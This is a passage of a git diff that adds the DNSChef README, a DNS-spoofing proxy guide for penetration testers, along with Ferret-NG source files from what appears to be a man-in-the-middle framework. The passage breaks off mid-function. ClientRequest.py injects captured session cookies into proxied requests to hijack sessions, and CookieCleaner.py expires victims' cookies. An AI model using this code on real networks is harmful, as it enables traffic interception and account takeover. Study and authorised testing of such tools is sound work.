+(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
\ No newline at end of file
diff --git a/core/dnschef/README.md b/core/dnschef/README.md
new file mode 100644
index 0000000..589a274
--- /dev/null
+++ b/core/dnschef/README.md
@@ -0,0 +1,339 @@
+DNSChef
+=======
+
+The latest version of this document can be obtained from http://thesprawl.org/projects/dnschef/
+
+DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka "Fake DNS") is a tool used for application network traffic analysis among other uses. For example, a DNS proxy can be used to fake requests for "badguy.com" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.
+
+There are several DNS proxies out there. Most will simply point all DNS queries to a single IP address or implement only rudimentary filtering. DNSChef was developed as part of a penetration test where there was a need for a more configurable system. As a result, DNSChef is a cross-platform application capable of forging responses based on inclusive and exclusive domain lists, supporting multiple DNS record types, matching domains with wildcards, proxying true responses for nonmatching domains, defining external configuration files, IPv6 and many other features. You can find a detailed explanation of each of the features and suggested uses below.
+
+The use of a DNS proxy is recommended in situations where it is not possible to force an application to use some other proxy server directly. For example, some mobile applications completely ignore OS HTTP proxy settings. In these cases, the use of a DNS proxy server such as DNSChef will allow you to trick that application into forwarding connections to the desired destination.
+
+Setting up a DNS Proxy
+======================
+
+Before you can start using DNSChef, you must configure your machine to use the host running DNSChef as its DNS nameserver. You have several options depending on the operating system you are going to use:
+
+* **Linux** - Edit */etc/resolv.conf* to include a line at the very top with your traffic analysis host (e.g. add "nameserver 127.0.0.1" if you are running locally). Alternatively, you can add a DNS server address using tools such as Network Manager. Inside Network Manager, open *IPv4 Settings*, select *Automatic (DHCP) addresses only* or *Manual* from the *Method* drop-down box, and edit the *DNS Servers* text box to include the IP address where DNSChef is running.
+
+* **Windows** - Select *Network Connections* from the *Control Panel*. Next select one of the connections (e.g. "Local Area Connection"), right-click on it and select *Properties*. In the dialog box that appears, select *Internet Protocol (TCP/IP)* and click *Properties*. Finally, select the *Use the following DNS server addresses* radio button and enter the IP address where DNSChef is running. For example, if running locally enter 127.0.0.1.
+
+* **OS X** - Open *System Preferences* and click on the *Network* icon. Select the active interface and fill in the *DNS Server* field. If you are using AirPort, you will have to click the *Advanced...* button and edit the DNS servers from there. Alternatively, you can edit */etc/resolv.conf* and add a fake nameserver to the very top there (e.g. "nameserver 127.0.0.1").
+
+* **iOS** - Open *Settings* and select *General*. Next select *Wi-Fi* and tap the blue arrow to the right of an active Access Point in the list. Edit the DNS entry to point to the host with DNSChef running. Make sure you have disabled the Cellular interface (if available).
+
+* **Android** - Open *Settings* and select *Wireless and network*. Click on *Wi-Fi settings* and select *Advanced* after pressing the *Options* button on the phone. Enable *Use static IP* checkbox and configure a custom DNS server.
+
+If you do not have the ability to modify the device's DNS settings manually, you still have several options involving techniques such as [ARP Spoofing](http://en.wikipedia.org/wiki/ARP_spoofing), [Rogue DHCP](http://www.yersinia.net/doc.htm) and other creative methods.
+
+Finally, you need to configure a fake service to which DNSChef will point all of the requests. For example, if you are trying to intercept web traffic, you must bring up either a separate web server running on port 80 or set up a web proxy (e.g. Burp) to intercept traffic. DNSChef will point queries to your proxy/server host with properly configured services.
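+
+If all you need is a quick catch-all listener for the redirected HTTP traffic, Python's built-in BaseHTTPServer is often enough. The snippet below is only a minimal sketch (the file name is made up for the example); any real web server or intercepting proxy such as Burp works just as well:
+
+    # catchall.py - hypothetical helper, not part of DNSChef; run as root to bind port 80
+    import BaseHTTPServer
+
+    class CatchAll(BaseHTTPServer.BaseHTTPRequestHandler):
+        def do_GET(self):
+            # log whatever the tricked application asked for, then answer with a stub page
+            self.send_response(200)
+            self.send_header("Content-Type", "text/html")
+            self.end_headers()
+            self.wfile.write("<html><body>intercepted</body></html>")
+
+    BaseHTTPServer.HTTPServer(("0.0.0.0", 80), CatchAll).serve_forever()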
+
+Running DNSChef
+===============
+
+DNSChef is a cross-platform application developed in Python which should run on most platforms that have a Python interpreter. You can use the supplied *dnschef.exe* executable to run it on Windows hosts without installing a Python interpreter. This guide concentrates on Unix environments; however, all of the examples below were tested to work on Windows as well.
+
+Let's get a taste of DNSChef with its most basic monitoring functionality. Execute the following command as root (required to start a server on port 53):
+
+ # ./dnschef.py
+
+ _ _ __
+ | | version 0.2 | | / _|
+ __| |_ __ ___ ___| |__ ___| |_
+ / _` | '_ \/ __|/ __| '_ \ / _ \ _|
+ | (_| | | | \__ \ (__| | | | __/ |
+ \__,_|_| |_|___/\___|_| |_|\___|_|
+ iphelix@thesprawl.org
+
+ [*] DNSChef started on interface: 127.0.0.1
+ [*] Using the following nameservers: 8.8.8.8
+ [*] No parameters were specified. Running in full proxy mode
+
+
+Without any parameters, DNSChef will run in full proxy mode. This means that all requests will simply be forwarded to an upstream DNS server (8.8.8.8 by default) and returned to the querying host. For example, let's query an "A" record for a domain and observe the results:
+
+ $ host -t A thesprawl.org
+ thesprawl.org has address 108.59.3.64
+
+DNSChef will print the following log line showing time, source IP address, type of record requested and most importantly which name was queried:
+
+ [23:54:03] 127.0.0.1: proxying the response of type 'A' for thesprawl.org
+
+This mode is useful for simple application monitoring where you need to figure out which domains it uses for its communications.
+
+DNSChef has full support for IPv6, which can be activated using the *-6* or *--ipv6* flags. It works exactly like IPv4 mode, with the exception that the default listening interface is switched to ::1 and the default DNS server is switched to 2001:4860:4860::8888. Here is a sample output:
+
+ # ./dnschef.py -6
+ _ _ __
+ | | version 0.2 | | / _|
+ __| |_ __ ___ ___| |__ ___| |_
+ / _` | '_ \/ __|/ __| '_ \ / _ \ _|
+ | (_| | | | \__ \ (__| | | | __/ |
+ \__,_|_| |_|___/\___|_| |_|\___|_|
+ iphelix@thesprawl.org
+
+ [*] Using IPv6 mode.
+ [*] DNSChef started on interface: ::1
+ [*] Using the following nameservers: 2001:4860:4860::8888
+ [*] No parameters were specified. Running in full proxy mode
+ [00:35:44] ::1: proxying the response of type 'A' for thesprawl.org
+ [00:35:44] ::1: proxying the response of type 'AAAA' for thesprawl.org
+ [00:35:44] ::1: proxying the response of type 'MX' for thesprawl.org
+
+NOTE: By default, DNSChef creates a UDP listener. You can use TCP instead with the *--tcp* argument discussed later.
+
+Intercept all responses
+-----------------------
+
+Now that you know how to start DNSChef, let's configure it to fake all replies to point to 127.0.0.1 using the *--fakeip* parameter:
+
+ # ./dnschef.py --fakeip 127.0.0.1 -q
+ [*] DNSChef started on interface: 127.0.0.1
+ [*] Using the following nameservers: 8.8.8.8
+ [*] Cooking all A replies to point to 127.0.0.1
+ [23:55:57] 127.0.0.1: cooking the response of type 'A' for google.com to 127.0.0.1
+ [23:55:57] 127.0.0.1: proxying the response of type 'AAAA' for google.com
+ [23:55:57] 127.0.0.1: proxying the response of type 'MX' for google.com
+
+In the above output you can see that DNSChef was configured to resolve all 'A' queries to 127.0.0.1. The first log line shows that we have "cooked" the 'A' record response to point to 127.0.0.1. However, further requests for 'AAAA' and 'MX' records are simply proxied from a real DNS server. Let's see the output from the requesting program:
+
+ $ host google.com localhost
+ google.com has address 127.0.0.1
+ google.com has IPv6 address 2001:4860:4001:803::1001
+ google.com mail is handled by 10 aspmx.l.google.com.
+ google.com mail is handled by 40 alt3.aspmx.l.google.com.
+ google.com mail is handled by 30 alt2.aspmx.l.google.com.
+ google.com mail is handled by 20 alt1.aspmx.l.google.com.
+ google.com mail is handled by 50 alt4.aspmx.l.google.com.
+
+As you can see, the program was tricked into using 127.0.0.1 for the IPv4 address. However, the information obtained from the IPv6 (AAAA) and mail (MX) records appears completely legitimate. The goal of DNSChef is to have the least impact on the correct operation of the program, so if an application relies on a specific mailserver it will still obtain the correct one through this proxied request.
+
+Let's fake one more request to illustrate how to target multiple records at the same time:
+
+ # ./dnschef.py --fakeip 127.0.0.1 --fakeipv6 ::1 -q
+ [*] DNSChef started on interface: 127.0.0.1
+ [*] Using the following nameservers: 8.8.8.8
+ [*] Cooking all A replies to point to 127.0.0.1
+ [*] Cooking all AAAA replies to point to ::1
+ [00:02:14] 127.0.0.1: cooking the response of type 'A' for google.com to 127.0.0.1
+ [00:02:14] 127.0.0.1: cooking the response of type 'AAAA' for google.com to ::1
+ [00:02:14] 127.0.0.1: proxying the response of type 'MX' for google.com
+
+In addition to the *--fakeip* flag, I have now specified *--fakeipv6*, which fakes 'AAAA' record queries. Here is the updated program output:
+
+ $ host google.com localhost
+ google.com has address 127.0.0.1
+ google.com has IPv6 address ::1
+ google.com mail is handled by 10 aspmx.l.google.com.
+ google.com mail is handled by 40 alt3.aspmx.l.google.com.
+ google.com mail is handled by 30 alt2.aspmx.l.google.com.
+ google.com mail is handled by 20 alt1.aspmx.l.google.com.
+ google.com mail is handled by 50 alt4.aspmx.l.google.com.
+
+Once more, all of the records not explicitly overridden were proxied and returned from the real DNS server. However, the IPv4 (A) and IPv6 (AAAA) records were both faked to point to the local machine.
+
+DNSChef supports multiple record types:
+
+ +--------+--------------+-----------+--------------------------+
+ | Record | Description |Argument | Example |
+ +--------+--------------+-----------+--------------------------+
+ | A | IPv4 address |--fakeip | --fakeip 192.0.2.1 |
+ | AAAA | IPv6 address |--fakeipv6 | --fakeipv6 2001:db8::1 |
+ | MX | Mail server |--fakemail | --fakemail mail.fake.com |
+ | CNAME | CNAME record |--fakealias| --fakealias www.fake.com |
+ | NS | Name server |--fakens | --fakens ns.fake.com |
+ +--------+--------------+-----------+--------------------------+
+
+NOTE: For usability not all DNS record types are exposed on the command line. Additional records such as PTR, TXT, SOA, etc. can be specified using the --file flag and an appropriate record header. See the [external definitions file](#external-definitions-file) section below for details.
+
+Finally, let's observe how DNSChef handles queries of type ANY:
+
+ # ./dnschef.py --fakeip 127.0.0.1 --fakeipv6 ::1 --fakemail mail.fake.com --fakealias www.fake.com --fakens ns.fake.com -q
+ [*] DNSChef started on interface: 127.0.0.1
+ [*] Using the following nameservers: 8.8.8.8
+ [*] Cooking all A replies to point to 127.0.0.1
+ [*] Cooking all AAAA replies to point to ::1
+ [*] Cooking all MX replies to point to mail.fake.com
+ [*] Cooking all CNAME replies to point to www.fake.com
+ [*] Cooking all NS replies to point to ns.fake.com
+ [00:17:29] 127.0.0.1: cooking the response of type 'ANY' for google.com with all known fake records.
+
+A DNS ANY query results in DNSChef returning every faked record it knows about for the matching domain. Here is the output that the program will see:
+
+ $ host -t ANY google.com localhost
+ google.com has address 127.0.0.1
+ google.com has IPv6 address ::1
+ google.com mail is handled by 10 mail.fake.com.
+ google.com is an alias for www.fake.com.
+ google.com name server ns.fake.com.
+
+Filtering domains
+-----------------
+
+Using the above example, suppose you only want to intercept requests for *thesprawl.org* and leave queries for all other domains, such as *webfaction.com*, unmodified. You can use the *--fakedomains* parameter as illustrated below:
+
+ # ./dnschef.py --fakeip 127.0.0.1 --fakedomains thesprawl.org -q
+ [*] DNSChef started on interface: 127.0.0.1
+ [*] Using the following nameservers: 8.8.8.8
+ [*] Cooking replies to point to 127.0.0.1 matching: thesprawl.org
+ [00:23:37] 127.0.0.1: cooking the response of type 'A' for thesprawl.org to 127.0.0.1
+ [00:23:52] 127.0.0.1: proxying the response of type 'A' for mx9.webfaction.com
+
+In the above example, the request for *thesprawl.org* was faked, while the request for *mx9.webfaction.com* was left alone. Filtering domains is very useful when you want to isolate a single application without breaking everything else.
+
+NOTE: DNSChef will not verify whether the domain exists or not before faking the response. If you have specified a domain it will always resolve to a fake value whether it really exists or not.
+
+Reverse filtering
+-----------------
+
+In another situation you may need to fake responses for all requests except a defined list of domains. You can accomplish this task using the *--truedomains* parameter as follows:
+
+ # ./dnschef.py --fakeip 127.0.0.1 --truedomains thesprawl.org,*.webfaction.com -q
+ [*] DNSChef started on interface: 127.0.0.1
+ [*] Using the following nameservers: 8.8.8.8
+ [*] Cooking replies to point to 127.0.0.1 not matching: *.webfaction.com, thesprawl.org
+ [00:27:57] 127.0.0.1: proxying the response of type 'A' for mx9.webfaction.com
+ [00:28:05] 127.0.0.1: cooking the response of type 'A' for google.com to 127.0.0.1
+
+There are several things going on in the above example. First notice the use of a wildcard (*). All domains matching *.webfaction.com will be reverse matched and resolved to their true values. The request for 'google.com' returned 127.0.0.1 because it was not on the list of excluded domains.
+
+NOTE: Wildcards are position specific. A mask of type *.thesprawl.org will match www.thesprawl.org but not www.test.thesprawl.org. However, a mask of type *.*.thesprawl.org will match thesprawl.org, www.thesprawl.org and www.test.thesprawl.org.
+
+External definitions file
+-------------------------
+
+There may be situations where defining a single fake DNS record for all matching domains may not be sufficient. You can use an external file with a collection of DOMAIN=RECORD pairs defining exactly where you want the request to go.
+
+For example, let's create the following definitions file and call it *dnschef.ini*:
+
+ [A]
+ *.google.com=192.0.2.1
+ thesprawl.org=192.0.2.2
+ *.wordpress.*=192.0.2.3
+
+Notice the section header [A]; it tells DNSChef the record type. Now let's carefully observe the output of multiple queries:
+
+ # ./dnschef.py --file dnschef.ini -q
+ [*] DNSChef started on interface: 127.0.0.1
+ [*] Using the following nameservers: 8.8.8.8
+ [+] Cooking A replies for domain *.google.com with '192.0.2.1'
+ [+] Cooking A replies for domain thesprawl.org with '192.0.2.2'
+ [+] Cooking A replies for domain *.wordpress.* with '192.0.2.3'
+ [00:43:54] 127.0.0.1: cooking the response of type 'A' for google.com to 192.0.2.1
+ [00:44:05] 127.0.0.1: cooking the response of type 'A' for www.google.com to 192.0.2.1
+ [00:44:19] 127.0.0.1: cooking the response of type 'A' for thesprawl.org to 192.0.2.2
+ [00:44:29] 127.0.0.1: proxying the response of type 'A' for www.thesprawl.org
+ [00:44:40] 127.0.0.1: cooking the response of type 'A' for www.wordpress.org to 192.0.2.3
+ [00:44:51] 127.0.0.1: cooking the response of type 'A' for wordpress.com to 192.0.2.3
+ [00:45:02] 127.0.0.1: proxying the response of type 'A' for slashdot.org
+
+Both *google.com* and *www.google.com* matched the *\*.google.com* entry and correctly resolved to *192.0.2.1*. On the other hand, the *www.thesprawl.org* request was simply proxied instead of being modified. All variations of *wordpress.com*, *www.wordpress.org*, etc. matched the *\*.wordpress.\** mask and correctly resolved to *192.0.2.3*. Finally, the undefined *slashdot.org* query was simply proxied with a real response.
+
+You can specify section headers for all other supported DNS record types including the ones not explicitly exposed on the command line: [A], [AAAA], [MX], [NS], [CNAME], [PTR], [NAPTR] and [SOA]. For example, let's define a new [PTR] section in the 'dnschef.ini' file:
+
+ [PTR]
+ *.2.0.192.in-addr.arpa=fake.com
+
+Let's observe DNSChef's behavior with this new record type:
+
+ ./dnschef.py --file dnschef.ini -q
+ [sudo] password for iphelix:
+ [*] DNSChef started on interface: 127.0.0.1
+ [*] Using the following nameservers: 8.8.8.8
+ [+] Cooking PTR replies for domain *.2.0.192.in-addr.arpa with 'fake.com'
+ [00:11:34] 127.0.0.1: cooking the response of type 'PTR' for 1.2.0.192.in-addr.arpa to fake.com
+
+And here is what a client might see when performing reverse DNS queries:
+
+ $ host 192.0.2.1 localhost
+ 1.2.0.192.in-addr.arpa domain name pointer fake.com.
+
+Some records require exact formatting; good examples are SOA and NAPTR:
+
+ [SOA]
+ *.thesprawl.org=ns.fake.com. hostmaster.fake.com. 1 10800 3600 604800 3600
+
+ [NAPTR]
+ *.thesprawl.org=100 10 U E2U+sip !^.*$!sip:customer-service@fake.com! .
+
+See the sample dnschef.ini file for additional examples.
+
+Advanced Filtering
+------------------
+
+You can mix and match input from a file and the command line. For example, the following command uses both the *--file* and *--fakedomains* parameters:
+
+ # ./dnschef.py --file dnschef.ini --fakeip 6.6.6.6 --fakedomains=thesprawl.org,slashdot.org -q
+ [*] DNSChef started on interface: 127.0.0.1
+ [*] Using the following nameservers: 8.8.8.8
+ [+] Cooking A replies for domain *.google.com with '192.0.2.1'
+ [+] Cooking A replies for domain thesprawl.org with '192.0.2.2'
+ [+] Cooking A replies for domain *.wordpress.* with '192.0.2.3'
+ [*] Cooking A replies to point to 6.6.6.6 matching: *.wordpress.*, *.google.com, thesprawl.org
+ [*] Cooking A replies to point to 6.6.6.6 matching: slashdot.org, *.wordpress.*, *.google.com, thesprawl.org
+ [00:49:05] 127.0.0.1: cooking the response of type 'A' for google.com to 192.0.2.1
+ [00:49:15] 127.0.0.1: cooking the response of type 'A' for slashdot.org to 6.6.6.6
+ [00:49:31] 127.0.0.1: cooking the response of type 'A' for thesprawl.org to 6.6.6.6
+ [00:50:08] 127.0.0.1: proxying the response of type 'A' for tor.com
+
+Notice that the definition for *thesprawl.org* on the command line took precedence over *dnschef.ini*. This is useful if you want to override values in the configuration file. *slashdot.org* still resolves to the fake IP address because it was specified in the *--fakedomains* parameter. The *tor.com* request is simply proxied since it was not specified on the command line or in the configuration file.
+
+Other configurations
+====================
+
+For security reasons, DNSChef listens on a local 127.0.0.1 (or ::1 for IPv6) interface by default. You can make DNSChef listen on another interface using the *--interface* parameter:
+
+ # ./dnschef.py --interface 0.0.0.0 -q
+ [*] DNSChef started on interface: 0.0.0.0
+ [*] Using the following nameservers: 8.8.8.8
+ [*] No parameters were specified. Running in full proxy mode
+ [00:50:53] 192.0.2.105: proxying the response of type 'A' for thesprawl.org
+
+or for IPv6:
+
+ # ./dnschef.py -6 --interface :: -q
+ [*] Using IPv6 mode.
+ [*] DNSChef started on interface: ::
+ [*] Using the following nameservers: 2001:4860:4860::8888
+ [*] No parameters were specified. Running in full proxy mode
+ [00:57:46] 2001:db8::105: proxying the response of type 'A' for thesprawl.org
+
+By default, DNSChef uses Google's public DNS server to make proxy requests. However, you can define a custom list of nameservers using the *--nameservers* parameter:
+
+ # ./dnschef.py --nameservers 4.2.2.1,4.2.2.2 -q
+ [*] DNSChef started on interface: 127.0.0.1
+ [*] Using the following nameservers: 4.2.2.1, 4.2.2.2
+ [*] No parameters were specified. Running in full proxy mode
+ [00:55:08] 127.0.0.1: proxying the response of type 'A' for thesprawl.org
+
+It is possible to specify a non-standard nameserver port using the IP#PORT notation:
+
+ # ./dnschef.py --nameservers 192.0.2.2#5353 -q
+ [*] DNSChef started on interface: 127.0.0.1
+ [*] Using the following nameservers: 192.0.2.2#5353
+ [*] No parameters were specified. Running in full proxy mode
+ [02:03:12] 127.0.0.1: proxying the response of type 'A' for thesprawl.org
+
+At the same time it is possible to start DNSChef itself on an alternative port using the *-p port#* parameter:
+
+ # ./dnschef.py -p 5353 -q
+ [*] Listening on an alternative port 5353
+ [*] DNSChef started on interface: 127.0.0.1
+ [*] Using the following nameservers: 8.8.8.8
+ [*] No parameters were specified. Running in full proxy mode
+
+The DNS protocol can be used over UDP (the default) or TCP. DNSChef implements a TCP mode which can be activated with the *--tcp* flag.
+
+Internal architecture
+=====================
+
+Here is some information on the internals in case you need to adapt the tool for your needs. DNSChef is built on top of the SocketServer module and uses threading to help process multiple requests simultaneously. The tool is designed to listen on TCP or UDP ports (default is port 53) for incoming requests and forward those requests when necessary to a real DNS server over UDP.
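+
+For orientation, here is a minimal sketch of that threaded SocketServer pattern (illustrative only, not DNSChef's actual code; the DNS-specific parsing is left out):
+
+    import SocketServer, threading
+
+    class ThreadedUDPServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
+        allow_reuse_address = True
+
+    class DNSHandler(SocketServer.BaseRequestHandler):
+        def handle(self):
+            data, sock = self.request              # for UDP servers: (raw query bytes, socket)
+            # ... dissect 'data' with dnslib, then either forge a reply or
+            # forward the query to a real nameserver and relay its answer ...
+            sock.sendto(data, self.client_address) # placeholder: echo the query back
+
+    server = ThreadedUDPServer(("127.0.0.1", 53), DNSHandler)
+    server_thread = threading.Thread(target=server.serve_forever)
+    server_thread.daemon = True                    # exit together with the main thread
+    server_thread.start()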
+
+The excellent [dnslib library](https://bitbucket.org/paulc/dnslib/wiki/Home) is used to dissect and reassemble DNS packets. It is particularly useful when generating response packets based on queries. [IPy](https://github.com/haypo/python-ipy/) is used for IPv6 address manipulation. Both libraries come bundled with DNSChef to ease installation.
+
+DNSChef is capable of modifying queries for records of type "A", "AAAA", "MX", "CNAME", "NS", "TXT", "PTR", "NAPTR", "SOA" and "ANY". It is very easy to expand or modify the behavior for any record type. Simply add another **if qtype == "RECORD TYPE"** entry and tell it what to reply with.
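+
+To make the reply side concrete, here is a small self-contained dnslib example that forges a TXT answer (the domain and text are made up for illustration); each record branch builds its reply in essentially this way:
+
+    from dnslib import DNSRecord, RR, QTYPE, TXT
+
+    query = DNSRecord.question("example.com", "TXT")  # what a client would send
+    response = query.reply()                          # reply header derived from the query
+    response.add_answer(RR("example.com", QTYPE.TXT, rdata=TXT("faked by dnschef"), ttl=60))
+    raw = response.pack()                             # raw bytes written back to the socket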
+
+Enjoy the tool and forward all requests and comments to iphelix [at] thesprawl.org.
+
+Happy hacking!
+ -Peter
diff --git a/core/publicsuffix/__init__.py b/core/dnschef/__init__.py
similarity index 100%
rename from core/publicsuffix/__init__.py
rename to core/dnschef/__init__.py
diff --git a/core/ferretng/ClientRequest.py b/core/ferretng/ClientRequest.py
new file mode 100644
index 0000000..c9eeb36
--- /dev/null
+++ b/core/ferretng/ClientRequest.py
@@ -0,0 +1,173 @@
+# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+import urlparse
+import logging
+import os
+import sys
+import random
+import re
+
+from twisted.web.http import Request
+from twisted.web.http import HTTPChannel
+from twisted.web.http import HTTPClient
+
+from twisted.internet import ssl
+from twisted.internet import defer
+from twisted.internet import reactor
+from twisted.internet.protocol import ClientFactory
+
+from ServerConnectionFactory import ServerConnectionFactory
+from ServerConnection import ServerConnection
+from SSLServerConnection import SSLServerConnection
+from URLMonitor import URLMonitor
+from CookieCleaner import CookieCleaner
+from DnsCache import DnsCache
+
+mitmf_logger = logging.getLogger('mitmf')
+
+class ClientRequest(Request):
+
+ ''' This class represents incoming client requests and is essentially where
+ the magic begins. Here we remove the client headers we dont like, and then
+ respond with either favicon spoofing, session denial, or proxy through HTTP
+ or SSL to the server.
+ '''
+
+ def __init__(self, channel, queued, reactor=reactor):
+ Request.__init__(self, channel, queued)
+ self.reactor = reactor
+ self.urlMonitor = URLMonitor.getInstance()
+ self.cookieCleaner = CookieCleaner.getInstance()
+ self.dnsCache = DnsCache.getInstance()
+ #self.uniqueId = random.randint(0, 10000)
+
+ def cleanHeaders(self):
+ headers = self.getAllHeaders().copy()
+
+ if 'accept-encoding' in headers:
+ del headers['accept-encoding']
+ mitmf_logger.debug("[Ferret-NG] [ClientRequest] Zapped encoding")
+
+ if 'if-modified-since' in headers:
+ del headers['if-modified-since']
+
+ if 'cache-control' in headers:
+ del headers['cache-control']
+
+ if 'host' in headers:
+ try:
+ for entry in self.urlMonitor.cookies[self.urlMonitor.hijack_client]:
+ if headers['host'] == entry['host']:
+ mitmf_logger.info("[Ferret-NG] Hijacking session for host: {}".format(headers['host']))
+ headers['cookie'] = entry['cookie']
+ except KeyError:
+ mitmf_logger.error("[Ferret-NG] No captured sessions (yet) from {}".format(self.urlMonitor.hijack_client))
+ pass
+
+ return headers
+
+ def getPathFromUri(self):
+ if (self.uri.find("http://") == 0):
+ index = self.uri.find('/', 7)
+ return self.uri[index:]
+
+ return self.uri
+
+ def handleHostResolvedSuccess(self, address):
+ mitmf_logger.debug("[Ferret-NG] [ClientRequest] Resolved host successfully: {} -> {}".format(self.getHeader('host'), address))
+ host = self.getHeader("host")
+ headers = self.cleanHeaders()
+ client = self.getClientIP()
+ path = self.getPathFromUri()
+ url = 'http://' + host + path
+ self.uri = url # set URI to absolute
+
+ if self.content:
+ self.content.seek(0,0)
+
+ postData = self.content.read()
+
+ hostparts = host.split(':')
+ self.dnsCache.cacheResolution(hostparts[0], address)
+
+ if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
+ mitmf_logger.debug("[Ferret-NG] [ClientRequest] Sending expired cookies")
+ self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, host, headers, path))
+
+ elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)):
+ if 'securelink' in headers:
+ del headers['securelink']
+
+ mitmf_logger.debug("[Ferret-NG] [ClientRequest] Sending request via SSL ({})".format((client,url)))
+ self.proxyViaSSL(address, self.method, path, postData, headers, self.urlMonitor.getSecurePort(client, url))
+
+ else:
+ mitmf_logger.debug("[Ferret-NG] [ClientRequest] Sending request via HTTP")
+ #self.proxyViaHTTP(address, self.method, path, postData, headers)
+ port = 80
+ if len(hostparts) > 1:
+ port = int(hostparts[1])
+
+ self.proxyViaHTTP(address, self.method, path, postData, headers, port)
+
+ def handleHostResolvedError(self, error):
+ mitmf_logger.debug("[Ferret-NG] [ClientRequest] Host resolution error: {}".format(error))
+ try:
+ self.finish()
+ except:
+ pass
+
+ def resolveHost(self, host):
+ address = self.dnsCache.getCachedAddress(host)
+
+ if address != None:
+ mitmf_logger.debug("[Ferret-NG] [ClientRequest] Host cached: {} {}".format(host, address))
+ return defer.succeed(address)
+ else:
+ return reactor.resolve(host)
+
+ def process(self):
+ mitmf_logger.debug("[Ferret-NG] [ClientRequest] Resolving host: {}".format(self.getHeader('host')))
+ host = self.getHeader('host').split(":")[0]
+
+ deferred = self.resolveHost(host)
+ deferred.addCallback(self.handleHostResolvedSuccess)
+ deferred.addErrback(self.handleHostResolvedError)
+
+ def proxyViaHTTP(self, host, method, path, postData, headers, port):
+ connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
+ connectionFactory.protocol = ServerConnection
+ #self.reactor.connectTCP(host, 80, connectionFactory)
+ self.reactor.connectTCP(host, port, connectionFactory)
+
+ def proxyViaSSL(self, host, method, path, postData, headers, port):
+ clientContextFactory = ssl.ClientContextFactory()
+ connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
+ connectionFactory.protocol = SSLServerConnection
+ self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory)
+
+ def sendExpiredCookies(self, host, path, expireHeaders):
+ self.setResponseCode(302, "Moved")
+ self.setHeader("Connection", "close")
+ self.setHeader("Location", "http://" + host + path)
+
+ for header in expireHeaders:
+ self.setHeader("Set-Cookie", header)
+
+ self.finish()
diff --git a/core/ferretng/CookieCleaner.py b/core/ferretng/CookieCleaner.py
new file mode 100644
index 0000000..5ba393c
--- /dev/null
+++ b/core/ferretng/CookieCleaner.py
@@ -0,0 +1,105 @@
+# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+import logging
+import string
+
+class CookieCleaner:
+ '''This class cleans cookies we haven't seen before. The basic idea is to
+ kill sessions, which isn't entirely straight-forward. Since we want this to
+ be generalized, there's no way for us to know exactly what cookie we're trying
+ to kill, which also means we don't know what domain or path it has been set for.
+
+ The rule with cookies is that specific overrides general. So cookies that are
+ set for mail.foo.com override cookies with the same name that are set for .foo.com,
+ just as cookies that are set for foo.com/mail override cookies with the same name
+ that are set for foo.com/
+
+ The best we can do is guess, so we just try to cover our bases by expiring cookies
+ in a few different ways. The most obvious thing to do is look for individual cookies
+ and nail the ones we haven't seen coming from the server, but the problem is that cookies are often
+ set by Javascript instead of a Set-Cookie header, and if we block those the site
+    will think cookies are disabled in the browser. So we do the expirations and whitelisting
+ based on client,server tuples. The first time a client hits a server, we kill whatever
+ cookies we see then. After that, we just let them through. Not perfect, but pretty effective.
+
+ '''
+
+ _instance = None
+
+ def __init__(self):
+ self.cleanedCookies = set();
+ self.enabled = False
+
+ @staticmethod
+ def getInstance():
+ if CookieCleaner._instance == None:
+ CookieCleaner._instance = CookieCleaner()
+
+ return CookieCleaner._instance
+
+ def setEnabled(self, enabled):
+ self.enabled = enabled
+
+ def isClean(self, method, client, host, headers):
+ if method == "POST": return True
+ if not self.enabled: return True
+ if not self.hasCookies(headers): return True
+
+ return (client, self.getDomainFor(host)) in self.cleanedCookies
+
+ def getExpireHeaders(self, method, client, host, headers, path):
+ domain = self.getDomainFor(host)
+ self.cleanedCookies.add((client, domain))
+
+ expireHeaders = []
+
+ for cookie in headers['cookie'].split(";"):
+ cookie = cookie.split("=")[0].strip()
+ expireHeadersForCookie = self.getExpireCookieStringFor(cookie, host, domain, path)
+ expireHeaders.extend(expireHeadersForCookie)
+
+ return expireHeaders
+
+ def hasCookies(self, headers):
+ return 'cookie' in headers
+
+ def getDomainFor(self, host):
+ hostParts = host.split(".")
+ return "." + hostParts[-2] + "." + hostParts[-1]
+
+ def getExpireCookieStringFor(self, cookie, host, domain, path):
+ pathList = path.split("/")
+ expireStrings = list()
+
